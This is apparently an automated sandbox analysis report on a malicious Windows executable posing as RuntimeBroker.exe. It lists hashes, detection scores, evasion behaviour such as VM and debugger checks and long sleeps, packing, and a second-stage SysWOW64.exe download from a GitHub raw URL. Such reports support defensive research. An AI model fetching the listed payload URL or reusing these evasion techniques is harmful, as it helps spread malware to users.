Edit tour

Windows Analysis Report
RuntimeBroker.exe

Overview

General Information

Sample name:	RuntimeBroker.exe
Analysis ID:	1651706
MD5:	61fd0424631fc50f17989c516950935e
SHA1:	8b616f88f47a9aa473512a91a8b3b39a7949aff7
SHA256:	c829147f0697e5a7c72e6aaac0b092b4d2a5e3d6a0132d540c49d2ea432877b9
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Score:	92
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Joe Sandbox ML detected suspicious sample

PE file has nameless sections

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: System File Execution Location Anomaly

Sigma detected: Windows Binaries Write Suspicious Extensions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

RuntimeBroker.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\RuntimeBroker.exe" MD5: 61FD0424631FC50F17989C516950935E)

cleanup

Sigma Signatures

System Summary

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\Desktop\RuntimeBroker.exe", CommandLine: "C:\Users\user\Desktop\RuntimeBroker.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\RuntimeBroker.exe, NewProcessName: C:\Users\user\Desktop\RuntimeBroker.exe, OriginalFileName: C:\Users\user\Desktop\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Users\user\Desktop\RuntimeBroker.exe", ProcessId: 7788, ProcessName: RuntimeBroker.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\RuntimeBroker.exe, ProcessId: 7788, TargetFilename: C:\Users\user\AppData\Local\Temp\{8432FDIJOFS-82490FDS-FDSFDU-489324FDS-3Y58FDJ-893UFDS-53HFDJOPFH-GDS94590349-FDSFFDS}\SysWOW64.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RuntimeBroker.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: RuntimeBroker.exe

ReversingLabs: Detection: 38%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 96.1%

Source: unknown

HTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49712 version: TLS 1.2

Source: RuntimeBroker.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: global traffic

HTTP traffic detected: GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1Host: github.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 140.82.114.4 140.82.114.4
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1Host: github.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: 35.56.3.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com

Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.comd
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49712 version: TLS 1.2

System Summary

PE file has nameless sections

Source: RuntimeBroker.exe	Static PE information: section name:
Source: RuntimeBroker.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05847590	0_2_05847590
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05848D20	0_2_05848D20
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05841C88	0_2_05841C88
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05840CA8	0_2_05840CA8
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05846CC0	0_2_05846CC0
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_058499C0	0_2_058499C0
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_058411C8	0_2_058411C8
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05846978	0_2_05846978
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05840C98	0_2_05840C98
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_058499B0	0_2_058499B0
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05848028	0_2_05848028

Source: RuntimeBroker.exe, 00000000.00000002.1546987185.0000000001212000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs RuntimeBroker.exe

Source: RuntimeBroker.exe

Static PE information: Section: w7 ZLIB complexity 1.0035807291666667

Source: classification engine

Classification label: mal92.evad.winEXE@1/0@4/2

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\RuntimeBroker.exe

File created: C:\Users\user\AppData\Local\Temp\{8432FDIJOFS-82490FDS-FDSFDU-489324FDS-3Y58FDJ-893UFDS-53HFDJOPFH-GDS94590349-FDSFFDS}

Jump to behavior

Source: RuntimeBroker.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RuntimeBroker.exe

ReversingLabs: Detection: 38%

Source: C:\Users\user\Desktop\RuntimeBroker.exe

File read: C:\Users\user\Desktop\RuntimeBroker.exe

Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Section loaded: winrnr.dll	Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RuntimeBroker.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RuntimeBroker.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Unpacked PE file: 0.2.RuntimeBroker.exe.bc0000.0.unpack :EW;Unknown_Section1:ER;Unknown_Section2:R;.Enigma:EW;UPX:ER;zjifahsi:R;.UPX:R;.reloc:R; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:EW;Unknown_Section4:ER;Unknown_Section5:R;Unknown_Section6:R;Unknown_Section7:R;

Source: RuntimeBroker.exe

Static PE information: 0xA6EAA72C [Fri Sep 27 23:47:56 2058 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: UPX

Source: RuntimeBroker.exe	Static PE information: section name: w7
Source: RuntimeBroker.exe	Static PE information: section name:
Source: RuntimeBroker.exe	Static PE information: section name:
Source: RuntimeBroker.exe	Static PE information: section name: .Enigma
Source: RuntimeBroker.exe	Static PE information: section name: UPX
Source: RuntimeBroker.exe	Static PE information: section name: zjifahsi
Source: RuntimeBroker.exe	Static PE information: section name: .UPX

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_05844532 pushfd ; iretd	0_2_05844531
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_058444E2 pushfd ; iretd	0_2_05844531
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Code function: 0_2_0584696D pushfd ; iretd	0_2_05846975

Source: RuntimeBroker.exe

Static PE information: section name: w7 entropy: 7.939048109812574

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\RuntimeBroker.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Memory allocated: 3320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Memory allocated: 3320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Memory allocated: 5320000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe	File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	File opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599884	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599755	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599494	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599364	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599028	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598911	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598793	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598234	Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Window / User API: threadDelayed 1048			Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Window / User API: threadDelayed 1530			Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7884	Thread sleep count: 1048 > 30	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7884	Thread sleep count: 1530 > 30	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599884s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599755s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599494s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599364s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -599028s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598911s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598793s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe TID: 7876	Thread sleep time: -598234s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599884	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599755	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599494	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599364	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 599028	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598911	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598793	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Thread delayed: delay time: 598234	Jump to behavior

Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)C:\WINDOWS\system32\drivers\VBoxMouse.sys
